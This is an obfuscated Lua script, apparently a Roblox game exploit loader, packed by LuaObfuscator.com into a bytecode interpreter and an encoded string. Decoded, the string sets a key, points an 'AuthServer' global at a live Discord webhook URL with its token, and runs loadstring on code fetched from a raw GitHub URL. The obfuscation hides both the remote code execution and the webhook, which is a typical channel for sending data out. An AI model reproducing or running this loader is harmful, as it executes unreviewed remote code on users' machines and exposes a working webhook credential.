--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.0) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v75=v2(v0(v30,16));if v19 then local v87=v5(v75,v19);v19=nil;return v87;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((1881 -(1202 + (1650 -973)))^(v32-(1 + 0))))%((1390 -(1189 + 199))^(((v33-(199 -(154 + 44))) -(v32-(3 -2))) + (1 -0)));return v76-(v76%(3 -2));else local v77=2^(v32-((1745 -(500 + 1244)) -0));return (((v31%(v77 + v77))>=v77) and (1 + 0)) or (1930 -(189 + 1741));end end local function v21()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v1(v16,v18,v18 + (55 -(28 + 25)));v18=v18 + 2;return (v40 * (45 + 211)) + v39;end local function v23()local v41,v42,v43,v44=v1(v16,v18,v18 + (916 -((1499 -(1040 + 39)) + 493)));v18=v18 + 4;return (v44 * (6420499 + 10356717)) + (v43 * (109101 -43565)) + (v42 * (220 + 36)) + v41;end local function v24()local v45=v23();local v46=v23();local v47=1 -0;local v48=(v20(v46,1505 -(842 + 662),28 -8) * ((9 -(9 -2))^((2380 -1679) -(193 + 476)))) + v45;local v49=v20(v46,19 + 2,22 + 9);local v50=((v20(v46,9 + 23)==((1 -0) -0)) and  -(1 + (27 -(13 + 14)))) or 1;if (v49==(0 + 0)) then if (v48==(0 -0)) then return v50 * (0 + 0);else v49=2 -1;v47=1542 -(64 + 1432 + 46);end elseif (v49==(253 + 847 + 947)) then return ((v48==((0 -0) + 0)) and (v50 * ((1 -0)/(0 -0)))) or (v50 * NaN);end return v8(v50,v49-(1631 -(448 + 160))) * (v47 + (v48/((2 + 0)^(1120 -(729 + 339)))));end local function v25(v34)local v51;if  not v34 then v34=v23();if (v34==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v34) -(1478 -(1077 + 400)));v18=v18 + v34;local v52={};for v63=3 -2, #v51 do v52[v63]=v2(v1(v3(v51,v63,v63)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53={};local v54={};local v55={};local v56={v53,v54,nil,v55};local v57=v23();local v58={};for v65=1,v57 do local v66=v21();local v67;if (v66==(1 + 0)) then v67=v21()~=(0 + 0);elseif (v66==2) then v67=v24();elseif (v66==(5 -2)) then v67=v25();end v58[v65]=v67;end v56[3]=v21();for v69=3 -2,v23() do local v70=v21();if (v20(v70,1,1)~=(0 -0)) then else local v83=v20(v70,2,1883 -(1221 + 659));local v84=v20(v70,4 + 0,1577 -(1259 + 312));local v85={v22(),v22(),nil,nil};if (v83==(674 -(381 + 293))) then v85[8 -5]=v22();v85[1723 -(159 + 1560)]=v22();elseif (v83==1) then v85[7 -4]=v23();elseif (v83==(508 -(93 + 413))) then v85[3]=v23() -((668 -(323 + 343))^(52 -36));elseif (v83~=3) then else v85[1810 -(308 + 1499)]=v23() -((3 -1)^16);v85[4]=v22();end if (v20(v84,1,1 -0)==(251 -(231 + 19))) then v85[2]=v58[v85[1594 -(988 + 604)]];end if (v20(v84,4 -2,2)==(1 + 0)) then v85[3]=v58[v85[2 + 1]];end if (v20(v84,7 -4,1 + 2)~=(1676 -(1449 + 226))) then else v85[4]=v58[v85[10 -6]];end v53[v69]=v85;end end for v71=1 + 0,v23() do v54[v71-(893 -(774 + 118))]=v28();end for v73=689 -(534 + 154),v23() do v55[v73]=v23();end return v56;end local function v29(v35,v36,v37)local v60=v35[1];local v61=v35[2];local v62=v35[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1;local function v82()local v88=v60;local v89=v61;local v90=v62;local v91=v27;local v92={};local v93={};local v94={};for v107=0 + 0 + 0,v81 do if ((v107>=v90) or ((1060 + 1537)==(12980 -8614))) then v92[v107-v90]=v80[v107 + (3 -2)];else v94[v107]=v80[v107 + 1 + 0];end end local v95=(v81-v90) + 1;local v96;local v97;while true do v96=v88[v78];v97=v96[(789 -(258 + 530)) + (1660 -(1544 + 116))];if ((v97<=(1 + (1514 -(1048 + 464)))) or (2592>(15055 -10528))) then if (((4449 -(574 + 448))>=(350 + 1819)) and (v97<=(768 -(162 + 605)))) then if ((((16169 -7896) -5111)<(4546 -(76 + 610))) and (v97==(0 -0))) then do return;end else v94[v96[2 -0]]=v96[3 + 0];end elseif ((v97>((15 -8) -(20 -15))) or ((1520 + 1082)<877)) then local v120=v96[2];local v121,v122=v91(v94[v120](v13(v94,v120 + (1 -0),v96[3])));v79=(v122 + v120) -(1 + 0);local v123=464 -(101 + 363);for v135=v120,v79 do v123=v123 + (190 -(165 + 24));v94[v135]=v121[v123];end else local v124=v96[1 + 1];v94[v124]=v94[v124](v13(v94,v124 + 1 + 0,v79));end elseif ((4227<=((5383 -(455 + 117)) -((37 -21) + 251))) and (v97<=(1 + (102 -(92 + 6))))) then if ((v97>((2123 -(1394 + 94)) -(235 + (411 -(11 + 4))))) or ((5841 -2329)<=(1791 -((1580 -(498 + 1006)) + 52)))) then v94[v96[1 + 1]]();else v94[v96[2]][v96[2 + 1]]=v96[15 -11];end elseif ((v97>(1 + 5)) or ((566 + 712)>=(501 + 521 + 338 + 168))) then v94[v96[(187 -(178 + 7)) -(1606 -(1250 + 356))]]=v37[v96[1016 -((1991 -(649 + 765)) + 436)]];else local v130=v96[2 -0];local v131=v94[v96[5 -2]];v94[v130 + ((580 + 436) -(859 + 156))]=v131;v94[v130]=v131[v96[1 + 3]];end v78=v78 + (539 -(443 + 95));end end A,B=v27(v11(v82));if  not A[1] then local v98=v35[4][v78] or "?";error("Script error at ["   .. v98   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F472O033O004B6579030F3O003O306974676F7064726168636972030A3O004175746853657276657203793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O3530383335382O3934303831333835342F376849794B764359636E7449652O466A78543671314D5A352D6356425A4F314854745F4371746650395F4A2D4B37483756775F6C2D7365644F504174704836554B6B5830030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742E6C7561000C3O0012073O00013O0030043O000200030012073O00013O0030043O000400050012073O00063O001207000100073O002006000100010008001201000300094O0003000100034O00025O00022O00053O000100016O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
